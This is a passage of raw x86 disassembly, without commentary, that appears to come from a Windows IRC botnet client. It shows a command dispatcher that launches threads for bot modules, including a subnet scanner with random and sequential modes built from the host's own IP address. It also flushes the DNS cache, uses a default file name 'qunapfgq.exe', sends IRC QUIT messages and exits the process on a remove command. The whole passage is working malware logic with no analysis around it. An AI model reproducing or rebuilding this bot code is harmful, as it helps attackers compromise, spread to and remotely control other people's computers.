push offset aFp ; "fp"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_403446
loc_4036D0: ; CODE XREF: sub_401ACD+1BEC�j
push [ebp+var_88]
lea eax, [ebp+var_FEC]
push 80h
push eax
call sub_41C360
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_FF0], eax
mov eax, [ebp+var_4]
mov [ebp+var_F68], eax
mov eax, [ebp+var_8]
mov [ebp+var_F64], eax
push offset unk_42C3C4
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41C360
push ebx
lea eax, [ebp+var_2C4]
push 26h
push eax
call sub_40B3BA
add esp, 18h
mov [ebp+var_F6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_FF0]
push ebx
push eax
push offset sub_4172C1
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_F6C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403778
loc_403762: ; CODE XREF: sub_401ACD+1CA9�j
cmp [ebp+var_F60], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403762
; ---------------------------------------------------------------------------
loc_403778: ; CODE XREF: sub_401ACD+1C93�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42C388
jmp loc_4082CF
; ---------------------------------------------------------------------------
loc_403789: ; CODE XREF: sub_401ACD+1B95�j
; sub_401ACD+1BAA�j
mov al, byte_4319DA
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_4319DA
jz loc_401F75
mov ecx, edx
loc_4037A0: ; CODE XREF: sub_401ACD+1CDB�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_4037A0
cmp al, bl
jz loc_401F75
mov [ebp+arg_18], edx
loc_4037B5: ; CODE XREF: sub_401ACD+1FAE�j
push 0Bh
call sub_40B602
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
mov edx, eax
mov eax, 320h
add edx, ecx
cmp edx, eax
jle short loc_403808
push ecx
lea eax, [ebp+var_2C4]
push offset dword_42C34C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 20h
jmp loc_403A72
; ---------------------------------------------------------------------------
loc_403808: ; CODE XREF: sub_401ACD+1D06�j
or [ebp+var_730], 0FFFFFFFFh
cmp dword_4317F8, ebx
mov [ebp+var_734], 64h
mov [ebp+var_748], 5
mov [ebp+var_744], eax
mov [ebp+arg_0], ebx
jz short loc_403875
mov eax, [ebp+arg_18]
mov esi, offset dword_4317F8
lea edi, [eax-0Ah]
loc_40383F: ; CODE XREF: sub_401ACD+1D8A�j
lea eax, [esi-28h]
push edi
push eax
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz short loc_40385B
inc [ebp+arg_0]
add esi, 40h
cmp [esi], ebx
jnz short loc_40383F
jmp short loc_403875
; ---------------------------------------------------------------------------
loc_40385B: ; CODE XREF: sub_401ACD+1D80�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_730], eax
shl ecx, 6
mov ecx, dword_4317F8[ecx]
mov [ebp+var_74C], ecx
loc_403875: ; CODE XREF: sub_401ACD+1D65�j
; sub_401ACD+1D8C�j
cmp [ebp+var_74C], ebx
jz loc_403A86
push 10h
lea eax, [ebp+var_2D4]
pop esi
push eax
lea eax, [ebp+var_30C]
push eax
mov [ebp+var_2D4], esi
push [ebp+arg_4]
call dword_4CB978 ; getsockname
mov al, [ebp+var_8FF]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_308], eax
push [ebp+var_308]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+var_860]
push eax
call sub_41BFD0
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_860]
push eax
call sub_41C820
add esp, 14h
cmp esi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_40391D
loc_4038FB: ; CODE XREF: sub_401ACD+1E4E�j
cmp eax, ebx
jz short loc_40391D
mov byte ptr [eax], 78h
lea eax, [ebp+var_860]
push 30h
push eax
call sub_41C820
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, esi
jl short loc_4038FB
loc_40391D: ; CODE XREF: sub_401ACD+1E2C�j
; sub_401ACD+1E30�j
mov eax, [ebp+arg_4]
push [ebp+var_88]
mov esi, [ebp+var_4]
mov edi, [ebp+var_8]
mov [ebp+var_750], eax
lea eax, [ebp+var_850]
push 80h
push eax
mov [ebp+var_720], 1
mov [ebp+var_728], esi
mov [ebp+var_724], edi
call sub_41C360
push offset byte_43DB88
push offset aF ; "#f"
call sub_41CA50
add esp, 14h
test eax, eax
jz short loc_40398A
push offset aF ; "#f"
lea eax, [ebp+var_7D0]
push 80h
push eax
call sub_41C360
add esp, 0Ch
jmp short loc_403990
; ---------------------------------------------------------------------------
loc_40398A: ; CODE XREF: sub_401ACD+1EA0�j
mov [ebp+var_7D0], bl
loc_403990: ; CODE XREF: sub_401ACD+1EBB�j
cmp [ebp+var_720], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_4039A2
mov eax, offset aSequential ; "Sequential"
loc_4039A2: ; CODE XREF: sub_401ACD+1ECE�j
push [ebp+var_734]
lea ecx, [ebp+var_860]
push [ebp+var_744]
push [ebp+var_748]
push [ebp+var_74C]
push ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C2CC
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 0Bh
push eax
call sub_40B3BA
add esp, 2Ch
mov [ebp+var_740], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_860]
push ebx
push eax
push offset sub_40C600
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_740]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403A2C
loc_403A1A: ; CODE XREF: sub_401ACD+1F5D�j
cmp [ebp+var_71C], ebx
jnz short loc_403A47
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403A1A
; ---------------------------------------------------------------------------
loc_403A2C: ; CODE XREF: sub_401ACD+1F4B�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C290
push eax
call sub_41C266
add esp, 0Ch
loc_403A47: ; CODE XREF: sub_401ACD+1F53�j
cmp edi, ebx
jnz short loc_403A65
push ebx
lea eax, [ebp+var_2C4]
push esi
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_403A65: ; CODE XREF: sub_401ACD+1F7C�j
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
pop ecx
loc_403A72: ; CODE XREF: sub_401ACD+1D36�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_4037B5
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_403A86: ; CODE XREF: sub_401ACD+1DAE�j
push offset unk_42C258
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_403A90: ; CODE XREF: sub_401ACD+1B05�j
; sub_401ACD+1B1A�j
push 5
call sub_40B602
test eax, eax
pop ecx
jle short loc_403AA6
push offset unk_42C238
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_403AA6: ; CODE XREF: sub_401ACD+1FCD�j
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
jz short loc_403AC9
push eax
mov edi, 104h
lea eax, [ebp+var_2D54]
push edi
push eax
call sub_41C360
add esp, 0Ch
jmp short loc_403ADD
; ---------------------------------------------------------------------------
loc_403AC9: ; CODE XREF: sub_401ACD+1FE2�j
mov edi, 104h
lea eax, [ebp+var_2D54]
push edi
push eax
push ebx
call ds:dword_427078 ; GetModuleFileNameA
loc_403ADD: ; CODE XREF: sub_401ACD+1FFA�j
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jnz short loc_403AED
mov esi, offset aQunapfgq_exe ; "qunapfgq.exe"
loc_403AED: ; CODE XREF: sub_401ACD+2019�j
push esi
lea eax, [ebp+var_2C50]
push edi
push eax
call sub_41C360
mov eax, dword_429078
push 7Fh
push [ebp+var_88]
mov [ebp+var_2B44], eax
mov eax, [ebp+arg_4]
mov [ebp+var_2B48], ebx
mov [ebp+var_2D58], eax
lea eax, [ebp+var_2B40]
push eax
call sub_41BFD0
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_2AC0], eax
mov eax, [ebp+var_8]
mov [ebp+var_2ABC], eax
lea eax, [ebp+var_2D54]
push eax
lea eax, [ebp+var_2C4]
push [ebp+var_2B44]
push offset unk_42C204
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 5
push eax
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_2B4C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2D58]
push ebx
push eax
push offset sub_412197
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_2B4C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403BB9
loc_403BA3: ; CODE XREF: sub_401ACD+20EA�j
cmp [ebp+var_2AB8], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403BA3
; ---------------------------------------------------------------------------
loc_403BB9: ; CODE XREF: sub_401ACD+20D4�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42C1C8
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_403BCA: ; CODE XREF: sub_401ACD+1ADB�j
; sub_401ACD+1AF0�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_403BE9
push edi
call sub_41C159
test eax, eax
pop ecx
jz short loc_403BE9
push edi
call sub_41C159
pop ecx
jmp short loc_403BEE
; ---------------------------------------------------------------------------
loc_403BE9: ; CODE XREF: sub_401ACD+2106�j
; sub_401ACD+2111�j
mov eax, dword_42907C
loc_403BEE: ; CODE XREF: sub_401ACD+211A�j
mov esi, [ebp+esi+var_88]
mov [ebp+var_36CC], eax
xor eax, eax
cmp [ebp+var_8FC], bl
setz al
cmp esi, ebx
mov [ebp+var_36B8], eax
jz short loc_403C21
lea eax, [ebp+var_37D0]
push esi
push eax
call sub_41C266
pop ecx
pop ecx
jmp short loc_403C4C
; ---------------------------------------------------------------------------
loc_403C21: ; CODE XREF: sub_401ACD+2141�j
lea eax, [ebp+var_49F4]
push 104h
push eax
call ds:dword_42707C ; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+var_4C8]
push ebx
push eax
lea eax, [ebp+var_49F4]
push eax
call sub_41C3B1
add esp, 14h
loc_403C4C: ; CODE XREF: sub_401ACD+2152�j
lea eax, [ebp+var_37D0]
push eax
call sub_41B9C0
cmp [ebp+eax+var_37D1], 5Ch
pop ecx
jnz short loc_403C77
lea eax, [ebp+var_37D0]
push eax
call sub_41B9C0
pop ecx
mov [ebp+eax+var_37D1], bl
loc_403C77: ; CODE XREF: sub_401ACD+2194�j
push [ebp+var_88]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_3A58]
mov [ebp+var_3A5C], esi
push 80h
push eax
call sub_41C360
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_36BC], eax
lea eax, [ebp+var_37D0]
mov [ebp+var_36C0], edi
push eax
push [ebp+var_36CC]
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C18C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 3
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_36C4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3A5C]
push ebx
push eax
push offset sub_40FAD6
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_36C4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403D2B
loc_403D19: ; CODE XREF: sub_401ACD+225C�j
cmp [ebp+var_36B0], ebx
jnz short loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403D19
; ---------------------------------------------------------------------------
loc_403D2B: ; CODE XREF: sub_401ACD+224A�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42C150
loc_403D37: ; CODE XREF: sub_401ACD+23BF�j
; sub_401ACD+4BDC�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
loc_403D46: ; CODE XREF: sub_401ACD+2252�j
; sub_401ACD+23A3�j ...
cmp [ebp+var_8], ebx
jnz loc_4082DE
push ebx
push edi
jmp loc_4071A3
; ---------------------------------------------------------------------------
loc_403D56: ; CODE XREF: sub_401ACD+1AB1�j
; sub_401ACD+1AC6�j
mov edi, [ebp+esi+var_8C]
cmp edi, ebx
jz short loc_403D75
push edi
call sub_41C159
test eax, eax
pop ecx
jz short loc_403D75
push edi
call sub_41C159
pop ecx
jmp short loc_403D7A
; ---------------------------------------------------------------------------
loc_403D75: ; CODE XREF: sub_401ACD+2292�j
; sub_401ACD+229D�j
mov eax, dword_429080
loc_403D7A: ; CODE XREF: sub_401ACD+22A6�j
mov [ebp+var_1828], eax
mov eax, [ebp+esi+var_88]
cmp eax, ebx
jnz short loc_403D91
lea eax, [ebp+var_C4]
loc_403D91: ; CODE XREF: sub_401ACD+22BC�j
push eax
lea eax, [ebp+var_1968]
push 40h
push eax
call sub_41C360
mov esi, [ebp+esi+var_84]
add esp, 0Ch
cmp esi, ebx
jnz short loc_403DB3
mov esi, offset byte_43DB88
loc_403DB3: ; CODE XREF: sub_401ACD+22DF�j
push esi
lea eax, [ebp+var_1928]
push 100h
push eax
call sub_41C360
add esp, 0Ch
lea eax, [ebp+var_19E8]
push [ebp+var_88]
push 80h
push eax
call sub_41C360
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1814], eax
lea eax, [ebp+var_1968]
push eax
mov [ebp+var_19EC], esi
push [ebp+var_1828]
mov [ebp+var_1818], edi
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42C114
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 9
push eax
call sub_40B3BA
add esp, 20h
mov [ebp+var_1824], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_19EC]
push ebx
push eax
push offset sub_41144E
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1824]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_403E80
loc_403E6A: ; CODE XREF: sub_401ACD+23B1�j
cmp [ebp+var_1810], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_403E6A
; ---------------------------------------------------------------------------
loc_403E80: ; CODE XREF: sub_401ACD+239B�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42C0D8
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_403E91: ; CODE XREF: sub_401ACD+1A87�j
; sub_401ACD+1A9C�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_403EA4
push esi
call sub_41C159
jmp short loc_403EAB
; ---------------------------------------------------------------------------
loc_403EA4: ; CODE XREF: sub_401ACD+23CD�j
push 0Bh
call sub_40B621
loc_403EAB: ; CODE XREF: sub_401ACD+23D5�j
cmp eax, ebx
pop ecx
jz loc_409644
push eax
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40BD1A
jmp loc_404376
; ---------------------------------------------------------------------------
loc_403ECB: ; CODE XREF: sub_401ACD+1A5D�j
; sub_401ACD+1A72�j
mov eax, dword_4CB8F0
cmp eax, ebx
jz short loc_403EE8
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_403EE1
push offset unk_42C0B4
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403EE1: ; CODE XREF: sub_401ACD+240B�j
push offset unk_42C088
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403EE8: ; CODE XREF: sub_401ACD+2405�j
push offset unk_42C05C
loc_403EED: ; CODE XREF: sub_401ACD+2412�j
; sub_401ACD+2419�j ...
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41C360
jmp loc_406BFB
; ---------------------------------------------------------------------------
loc_403F03: ; CODE XREF: sub_401ACD+1A33�j
; sub_401ACD+1A48�j
call sub_40A928
test eax, eax
jz short loc_403F13
push offset unk_42C038
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403F13: ; CODE XREF: sub_401ACD+243D�j
push offset unk_42C00C
jmp short loc_403EED
; ---------------------------------------------------------------------------
loc_403F1A: ; CODE XREF: sub_401ACD+1A09�j
; sub_401ACD+1A1E�j
cmp [ebp+var_8], ebx
jnz short loc_403F39
push ebx
push [ebp+var_4]
push offset dword_42BFF4
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_403F39: ; CODE XREF: sub_401ACD+2450�j
push ebx
push [ebp+var_4]
call sub_418723
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
push offset unk_42BFD8
jmp loc_40423F
; ---------------------------------------------------------------------------
loc_403F5B: ; CODE XREF: sub_401ACD+18A0�j
; sub_401ACD+18B5�j
push 0Ah
call sub_40B602
test eax, eax
pop ecx
jle short loc_403F6E
push offset unk_42BFAC
jmp short loc_403F8F
; ---------------------------------------------------------------------------
loc_403F6E: ; CODE XREF: sub_401ACD+2498�j
push [ebp+var_88]
push [ebp+arg_4]
call sub_41A1B1
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_403F8A
push offset unk_42BF84
jmp short loc_403F8F
; ---------------------------------------------------------------------------
loc_403F8A: ; CODE XREF: sub_401ACD+24B4�j
push offset unk_42BF64
loc_403F8F: ; CODE XREF: sub_401ACD+249F�j
; sub_401ACD+24BB�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
pop ecx
pop ecx
loc_403F9D: ; CODE XREF: sub_401ACD+5781�j
cmp [ebp+var_8], ebx
jnz short loc_403FBE
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
loc_403FB6: ; CODE XREF: sub_401ACD+6DA8�j
call sub_409869
add esp, 14h
loc_403FBE: ; CODE XREF: sub_401ACD+24D3�j
; sub_401ACD+26B0�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
jmp loc_4097D1
; ---------------------------------------------------------------------------
loc_403FCF: ; CODE XREF: sub_401ACD+1876�j
; sub_401ACD+188B�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40A5C5
jmp loc_404260
; ---------------------------------------------------------------------------
loc_403FE8: ; CODE XREF: sub_401ACD+184C�j
; sub_401ACD+1861�j
push [ebp+esi+var_8C]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_416FCF
jmp loc_404260
; ---------------------------------------------------------------------------
loc_404005: ; CODE XREF: sub_401ACD+1822�j
; sub_401ACD+1837�j
or edi, 0FFFFFFFFh
call ds:dword_4270B0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_40402E
push esi
call sub_41C159
pop ecx
mov edi, eax
loc_40402E: ; CODE XREF: sub_401ACD+2556�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_404047
cmp edi, 0FFFFFFFFh
jnz loc_409644
loc_404047: ; CODE XREF: sub_401ACD+256F�j
push ebx
call sub_41ADD8
pop ecx
push eax
lea eax, [ebp+var_2C4]
push offset unk_42BF4C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
loc_404085: ; CODE XREF: sub_401ACD+51BC�j
add esp, 24h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_40408D: ; CODE XREF: sub_401ACD+17F8�j
; sub_401ACD+180D�j
push 27h
call sub_40B602
test eax, eax
pop ecx
jle short loc_4040BE
cmp [ebp+var_8], ebx
jnz loc_401F75
push ebx
push [ebp+var_4]
push offset unk_42BF2C
loc_4040AB: ; CODE XREF: sub_401ACD+4F88�j
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
jmp loc_408C05
; ---------------------------------------------------------------------------
loc_4040BE: ; CODE XREF: sub_401ACD+25CA�j
push [ebp+var_88]
lea eax, [ebp+var_BC4]
push 80h
push eax
call sub_41C360
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_BC8], eax
mov eax, [ebp+var_4]
mov [ebp+var_B3C], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_B38], eax
mov [ebp+var_B40], ebx
jz short loc_40411F
push esi
push offset aFull ; "full"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_40411F
mov [ebp+var_B40], 1
loc_40411F: ; CODE XREF: sub_401ACD+2635�j
; sub_401ACD+2646�j
lea eax, [ebp+var_2C4]
push offset dword_42BF08
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 27h
push eax
call sub_40B3BA
add esp, 14h
mov [ebp+var_B44], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_BC8]
push ebx
push eax
push offset sub_419E38
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_B44]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40418D
loc_404177: ; CODE XREF: sub_401ACD+26BE�j
cmp [ebp+var_B34], ebx
jnz loc_403FBE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_404177
; ---------------------------------------------------------------------------
loc_40418D: ; CODE XREF: sub_401ACD+26A8�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2C4]
push offset unk_42BECC
push eax
call sub_41C266
add esp, 0Ch
jmp loc_403FBE
; ---------------------------------------------------------------------------
loc_4041AD: ; CODE XREF: sub_401ACD+17CE�j
; sub_401ACD+17E3�j
cmp [ebp+var_8], ebx
jnz short loc_4041CC
push ebx
push [ebp+var_4]
push offset unk_42BEB4
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_4041CC: ; CODE XREF: sub_401ACD+26E3�j
push [ebp+arg_4]
call dword_4CBA6C ; closesocket
call dword_4CB92C ; WSACleanup
call sub_4188A6
push ebx
call ds:dword_42706C ; ExitProcess
loc_4041E7: ; CODE XREF: sub_401ACD+17A4�j
; sub_401ACD+17B9�j
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_41AF8F
pop ecx
pop ecx
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
push offset unk_42BE9C
jmp short loc_40423F
; ---------------------------------------------------------------------------
loc_404212: ; CODE XREF: sub_401ACD+177A�j
; sub_401ACD+178F�j
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41B243
add esp, 0Ch
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
push offset unk_42BE84
loc_40423F: ; CODE XREF: sub_401ACD+2489�j
; sub_401ACD+2743�j
call sub_415D38
add esp, 18h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_40424C: ; CODE XREF: sub_401ACD+1750�j
; sub_401ACD+1765�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_415DD8
loc_404260: ; CODE XREF: sub_401ACD+3C8�j
; sub_401ACD+2516�j ...
add esp, 10h
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_404268: ; CODE XREF: sub_401ACD+1726�j
; sub_401ACD+173B�j
cmp [ebp+var_C], ebx
mov [ebp+var_1598], bl
jz short loc_4042A7
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_4042A7
push esi
push [ebp+var_C]
call sub_41C2E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4042A7
push eax
push offset aS_8 ; "%s"
lea eax, [ebp+var_1598]
push 80h
push eax
call sub_41C360
add esp, 10h
loc_4042A7: ; CODE XREF: sub_401ACD+27A4�j
; sub_401ACD+27AF�j ...
push [ebp+var_88]
lea eax, [ebp+var_1618]
push 80h
push eax
call sub_41C360
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_161C], eax
mov eax, [ebp+var_4]
mov [ebp+var_1514], eax
mov eax, [ebp+var_8]
mov [ebp+var_1510], eax
lea eax, [ebp+var_2C4]
push offset dword_42BE6C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 25h
push eax
call sub_40B3BA
add esp, 14h
mov [ebp+var_1518], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_161C]
push ebx
push eax
push offset sub_415E4B
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1518]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40434A
loc_404334: ; CODE XREF: sub_401ACD+287B�j
cmp [ebp+var_150C], ebx
jnz loc_401F75
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_404334
; ---------------------------------------------------------------------------
loc_40434A: ; CODE XREF: sub_401ACD+2865�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42BE34
jmp loc_4097CB
; ---------------------------------------------------------------------------
loc_40435B: ; CODE XREF: sub_401ACD+16FC�j
; sub_401ACD+1711�j
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_415CC0
push offset unk_42BE1C
call sub_415D38
loc_404376: ; CODE XREF: sub_401ACD+23F9�j
add esp, 10h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_40437E: ; CODE XREF: sub_401ACD+16D2�j
; sub_401ACD+16E7�j
push [ebp+var_88]
lea eax, [ebp+var_C5C]
push 80h
push eax
call sub_41C360
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_C60], eax
mov eax, [ebp+var_4]
mov [ebp+var_BD4], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_BD0], eax
jz short loc_4043D8
push offset dword_42BE18
push esi
call sub_41CA50
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_BD8], eax
jmp short loc_4043DE
; ---------------------------------------------------------------------------
loc_4043D8: ; CODE XREF: sub_401ACD+28EF�j
mov [ebp+var_BD8], ebx
loc_4043DE: ; CODE XREF: sub_401ACD+2909�j
lea eax, [ebp+var_2C4]
push offset dword_42BDF8
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 28h
push eax
call sub_40B3BA
add esp, 14h
mov [ebp+var_BDC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_C60]
push ebx
push eax
push offset sub_40B425
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_BDC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40444C
loc_404436: ; CODE XREF: sub_401ACD+297D�j
cmp [ebp+var_BCC], ebx
jnz loc_406C1F
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_404436
; ---------------------------------------------------------------------------
loc_40444C: ; CODE XREF: sub_401ACD+2967�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42BDBC
jmp loc_409091
; ---------------------------------------------------------------------------
loc_40445D: ; CODE XREF: sub_401ACD+1656�j
; sub_401ACD+166B�j
push offset aSbrti ; "sbrti"
push offset unk_42BDA4
loc_404467: ; CODE XREF: sub_401ACD+29D9�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 20h
jmp loc_406C1F
; ---------------------------------------------------------------------------
loc_404494: ; CODE XREF: sub_401ACD+162C�j
; sub_401ACD+1641�j
push dword_4CB714
call sub_41ADD8
pop ecx
push eax
push offset unk_42BD78
jmp short loc_404467
; ---------------------------------------------------------------------------
loc_4044A8: ; CODE XREF: sub_401ACD+1602�j
; sub_401ACD+1617�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz short loc_4044DA
cmp [ebp+var_C], ebx
jz short loc_4044E9
push esi
push [ebp+var_C]
call sub_41C2E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_4044E9
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
jmp short loc_4044E9
; ---------------------------------------------------------------------------
loc_4044DA: ; CODE XREF: sub_401ACD+29E4�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_409823
pop ecx
pop ecx
loc_4044E9: ; CODE XREF: sub_401ACD+29E9�j
; sub_401ACD+29F8�j ...
push 0FFFFFFFEh
jmp loc_401F77
; ---------------------------------------------------------------------------
loc_4044F0: ; CODE XREF: sub_401ACD+15D8�j
; sub_401ACD+15ED�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_409823
push offset unk_42BD28
call sub_415D38
add esp, 0Ch
